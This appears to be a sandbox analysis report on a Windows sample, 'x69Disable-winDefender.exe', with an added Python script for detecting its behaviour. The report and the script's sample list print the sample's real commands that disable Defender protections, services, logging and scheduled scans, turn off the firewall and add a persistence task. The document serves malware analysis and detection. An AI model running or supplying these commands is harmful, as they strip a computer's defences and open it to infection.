        C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
        - Checks computer location settings
        - Executes dropped EXE
        - Drops file in Program Files directory
        - System Location Discovery: System Language Discovery
        PID: 4940
        5⤵ C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\07c45773.bat" "
          - System Location Discovery: System Language Discovery
          PID: 5444
          6⤵ C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID: 5604
      4⤵ C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C14C.tmp\C14D.tmp\C14E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
        - Suspicious use of WriteProcessMemory
        PID: 2228
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4676
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5032
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4684
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3884
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3288
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4872
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5084
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2300
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 3736
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 5032
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -MAPSReporting 0"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 5052
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 3832
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 1520
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 2292
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 964
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 3564
          6⤵ C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            PID: 2112
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 1520
          6⤵ C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            PID: 2900
        5⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID: 4896
          6⤵ C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL
            PID: 2120
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          PID: 5212
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender DisableAntiSpyware settings
          PID: 5244
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          PID: 5268
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          PID: 5292
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
          PID: 5320
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
          PID: 5348
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
          PID: 5376
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
          PID: 5404
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          - Modifies Windows Defender Real-time Protection settings
          PID: 5436
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          PID: 5468
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          PID: 5492
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          PID: 5516
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          PID: 5544
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 5584
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 5608
        5⤵ C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          PID: 5636
        5⤵ C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          PID: 5668
        5⤵ C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          PID: 5700
        5⤵ C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          PID: 5740
        5⤵ C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          PID: 5772
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          PID: 5820
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          PID: 5844
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          PID: 5884
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          PID: 5916
        5⤵ C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          PID: 5940
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies Security services
          PID: 5984
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies Security services
          PID: 6004
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies Security services
          PID: 6020
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies Security services
          PID: 6036
        5⤵ C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies security service
          PID: 6052
  2⤵ C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
    - Suspicious use of WriteProcessMemory
    PID: 2456
    3⤵ C:\Users\Admin\AppData\Roaming\x69install.exe
      C:\Users\Admin\AppData\Roaming\x69install.exe
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      PID: 3764
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  PID: 3696
1⤵ C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID: 3864
1⤵ C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
  - Suspicious use of UnmapMainImage
  PID: 4024
1⤵ C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 4112
1⤵ C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k netsvcs -p
  PID: 4912
1⤵ C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID: 5116
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  PID: 1116
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
  PID: 3004
1⤵ C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 2840
1⤵ C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID: 1112
1⤵ C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID: 4236
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  PID: 1812
1⤵ C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID: 1660
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  PID: 2212
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
  PID: 4664
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  PID: 1984
1⤵ C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 4860
1⤵ C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
  PID: 3496
1⤵ C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks BIOS information in registry
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  PID: 536
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  PID: 5100
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  PID: 2160
1⤵ C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  PID: 3624
1⤵ C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  PID: 4968
1⤵ C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 1060
1⤵ C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 6092
1⤵ C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  PID: 3880
1⤵ C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  PID: 5052
1⤵ C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  PID: 5212
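The x69Disable-winDefender.exe subtree above is a compact catalogue of what a process-creation detection should key on: Set-MpPreference and Add-MpPreference calls, reg.exe writes under HKLM\Software\Policies\Microsoft\Windows Defender, Start=4 on the WdBoot/WdFilter/WdNisDrv/WdNisSvc/WinDefend services, Start=0 on the Defender autologgers, the Defender scheduled tasks being disabled, the SecurityHealth autostart being deleted, and netsh turning the firewall off, plus the two schtasks persistence entries (one ONLOGON, one every minute, both /RL HIGHEST). The Python below is an added example written for this page, not part of the sandbox report or of the sample: it parses command lines in the form shown in the tree into structured findings. The sample input is a constructed list of command lines copied from the tree (plus one benign svchost.exe line as a control); the Finding/RegOp records, the rule regexes and the behaviour labels are this example's own choices, and the tactic names follow the report's ATT&CK matrix.

```python
"""Added example (not part of the sandbox report): triage process-creation
command lines for the Defender-tampering and persistence behaviour shown in
the process tree above."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    tactic: str     # ATT&CK tactic, using the labels the report's matrix uses
    behaviour: str  # what the command does
    detail: str     # the setting or target pulled out of the command line


@dataclass(frozen=True)
class RegOp:
    op: str         # "add" or "delete"
    key: str
    value: Optional[str]
    reg_type: Optional[str]
    data: Optional[str]


# reg.exe as it appears in the tree: key quoted or bare, /v /t /d optional.
# Only ASCII double quotes count as quotes, so the two tree lines that wrap
# the key in typographic quotes (“hklm\...”) deliberately do not parse here.
REG_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+(?P<op>add|delete)\s+"?(?P<key>HK[^"/]+)"?'
    r'(?:\s*/v\s+"?(?P<value>[^"\s]+)"?)?'
    r'(?:\s*/t\s+(?P<reg_type>\w+))?'
    r'(?:\s*/d\s+"?(?P<data>[^"\s]+)"?)?', re.I)
MP_RE = re.compile(r'\b(Set|Add)-MpPreference\s+(-\w+)\s+([^"\s]+)', re.I)
TASK_CREATE_RE = re.compile(r'\bschtasks(?:\.exe)?"?\s+/create\b.*?/tn\s+"?([^"\s]+)"?', re.I)
TASK_DISABLE_RE = re.compile(r'\bschtasks(?:\.exe)?"?\s+/change\s+/tn\s+"?([^"]+)"?\s+/disable', re.I)
FIREWALL_RE = re.compile(r'\bnetsh(?:\.exe)?"?\s+advfirewall\s+set\s+allprofiles\s+state\s+off', re.I)
DEFENDER_SERVICES = {"wdboot", "wdfilter", "wdnisdrv", "wdnissvc", "windefend"}


def parse_reg(cmdline: str) -> Optional[RegOp]:
    """Structured view of a reg.exe add/delete, or None if the line is not one."""
    m = REG_RE.search(cmdline)
    if not m:
        return None
    return RegOp(m["op"].lower(), m["key"].strip(), m["value"], m["reg_type"], m["data"])


def classify_reg(r: RegOp) -> Optional[Finding]:
    """Map a registry operation to the Defender-tampering cases seen in the tree."""
    k = r.key.lower()
    leaf = r.key.rsplit("\\", 1)[-1]
    val = (r.value or "").lower()
    if r"policies\microsoft\windows defender" in k:
        what = f"{r.value}={r.data}" if r.value else "(whole key)"
        return Finding("Defense Evasion", f"Defender policy {r.op}", f"{r.key} {what}")
    if (re.search(r"\\services\\\w+$", k) and leaf.lower() in DEFENDER_SERVICES
            and val == "start" and r.data == "4"):
        return Finding("Defense Evasion", "Defender service set to Disabled (Start=4)", leaf)
    if r"\autologger\defender" in k and val == "start" and r.data == "0":
        return Finding("Defense Evasion", "Defender ETW autologger turned off", leaf)
    if r.op == "delete" and val == "securityhealth":
        return Finding("Defense Evasion", "Security Center tray autostart removed", r.key)
    if r.op == "delete" and k.endswith(r"\contextmenuhandlers\epp"):
        return Finding("Defense Evasion", "Defender context-menu handler removed", r.key)
    return None


def classify(cmdline: str) -> list[Finding]:
    """All findings for one command line; a stock svchost.exe line yields []."""
    found: list[Finding] = []
    reg = parse_reg(cmdline)
    if reg and (hit := classify_reg(reg)):
        found.append(hit)
    for verb, name, value in MP_RE.findall(cmdline):   # also matches inside powershell -command "..."
        value = value.strip("'")
        what = "Defender exclusion added" if verb.lower() == "add" else "Defender preference changed"
        found.append(Finding("Defense Evasion", what, f"{name} {value}"))
    if m := TASK_CREATE_RE.search(cmdline):
        sc = re.search(r"/sc\s+(\w+)", cmdline, re.I)
        mo = re.search(r"/mo\s+(\d+)", cmdline, re.I)
        rl = re.search(r"/rl\s+(\w+)", cmdline, re.I)
        found.append(Finding("Persistence", "Scheduled task created",
                             f"{m.group(1)} sc={sc.group(1).lower() if sc else '?'} "
                             f"mo={mo.group(1) if mo else '-'} rl={rl.group(1).upper() if rl else 'default'}"))
    if m := TASK_DISABLE_RE.search(cmdline):
        found.append(Finding("Defense Evasion", "Scheduled task disabled", m.group(1)))
    if FIREWALL_RE.search(cmdline):
        found.append(Finding("Defense Evasion", "Windows Firewall off for all profiles", "netsh advfirewall"))
    return found


def triage(cmdlines) -> dict[str, list[Finding]]:
    """Group findings by tactic so the summary reads like the report's matrix."""
    by_tactic: dict[str, list[Finding]] = {}
    for line in cmdlines:
        for f in classify(line):
            by_tactic.setdefault(f.tactic, []).append(f)
    return by_tactic


# Constructed sample input: command lines copied from the process tree above,
# as they would appear in a Sysmon Event ID 1 / Security 4688 CommandLine field.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"',
    r"""powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'""",
    r'powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv',  # benign control line
]

if __name__ == "__main__":
    for tactic, findings in triage(SAMPLE_CMDLINES).items():
        print(f"{tactic}: {len(findings)}")
        for f in findings:
            print(f"  {f.behaviour}: {f.detail}")
```

Feed it the CommandLine field of process-creation events rather than the image path: the powershell-wrapped `Reg add` and `netsh` lines in the tree are caught because the patterns search the embedded command, which a rule keyed only on the child reg.exe/netsh.exe image would see one hop later. The two entries that wrap the key in “ ” rather than ASCII quotes are left unmatched on purpose; reg.exe does not treat typographic quotes as quoting either, so they are worth reviewing by hand instead of being folded into the parser.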
MITRE ATT&CK Enterprise v16
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (4): Windows Service (4)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Impair Defenses (4): Disable or Modify System Firewall (1), Disable or Modify Tools (2)
- Modify Registry (5)
Downloads
-
Filesize
31KB
MD5ddd5265a64cedb9fc9dce8841678d3a7
SHA1942afa202bb0aacb4c5b9b774905519d2dabfde8
SHA25663644fe64dfdb3789bfe1dd60e44792d05bf030f7a7ad72b74f828527d29d396
SHA5123888f28110294610da3d63d66b0b53a3068d2b28af3edd86726dce8863ee71583ab498aa8f31c7653d5c97c238aeb0386cf63c8b1e1c717d4e3a11b3a9c9f4e9
-
Filesize
2KB
MD5a43e653ffb5ab07940f4bdd9cc8fade4
SHA1af43d04e3427f111b22dc891c5c7ee8a10ac4123
SHA256c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe
SHA51262a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b
-
Filesize
1KB
MD5bb6a89a9355baba2918bb7c32eca1c94
SHA1976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f
-
Filesize
1B
MD568b329da9893e34099c7d8ad5cb9c940
SHA1adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA25601ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09
-
Filesize
944B
MD54f473e15a0686d0c819ad40b5f232368
SHA1a769892ae2e8203e7d4a992a317189b56723da33
SHA25653d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237
SHA512d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55
-
Filesize
944B
MD50026cdd9bbc34b9de2447c0eb04c14b5
SHA1ab7713fe5fbbb23031937dd1dc7d0fa238884ad4
SHA256cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d
SHA51262aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD5e2efbfd23e33d8d07d019bdd9ca20649
SHA168d3b285c423d311bdf8dc53354f5f4000caf386
SHA256f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828
SHA512b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443
-
Filesize
944B
MD5a7cc007980e419d553568a106210549a
SHA1c03099706b75071f36c3962fcc60a22f197711e0
SHA256a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165
SHA512b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666
-
Filesize
944B
MD5fd35037a4bce53228fc0c6f658209cfc
SHA117ce97a410f34a30e577e438b6602431caf90bd9
SHA25662d002ca5023ddb8272ecc8c735590f778c1f59b2ebc6fb5448c86e0d3770089
SHA51286f318f8c09b0316c91cf814ecee6f54e9a11c99a1150cf2f8864548d97d2488ab4d8ec3d731856d212c7ca4237da7bcb30fed4e7e4a1a2aa5649863f9d44263
-
Filesize
944B
MD5dd1d0b083fedf44b482a028fb70b96e8
SHA1dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA51296bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973
-
Filesize
944B
MD59d20bed748fbb656980b0328d7b74728
SHA15fc8910c493356c0968a86452cb7952917b954b4
SHA256172fe07653a93456e66d5b90333de53e23a561cf982a1a9d96c3459339009069
SHA512eb1f0ca1042371a0d324ba520a9c4159fe91d34cf1851d829b1bf874b92f69fd08c540558d03f9a8c3286926c3c12d89ef9a70ac649c053a02f26922918054f1
-
Filesize
944B
MD5871daa0605e2bf4f8259c6ed08922818
SHA18448225f10d502ce858e9f6818945bf7994d5963
SHA256d0fe73c3319af4bb23a904483ac9af46406b0b559023809daac4ab4dba0fc3e7
SHA512f97ce6108457836d2059d9ddf7272a811a3d332275f5bcc3887b18cb1b9a9e6f4359ca808302f13ef4245d4b39ac4636bd926f869cfa7851531457cf2db595ed
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
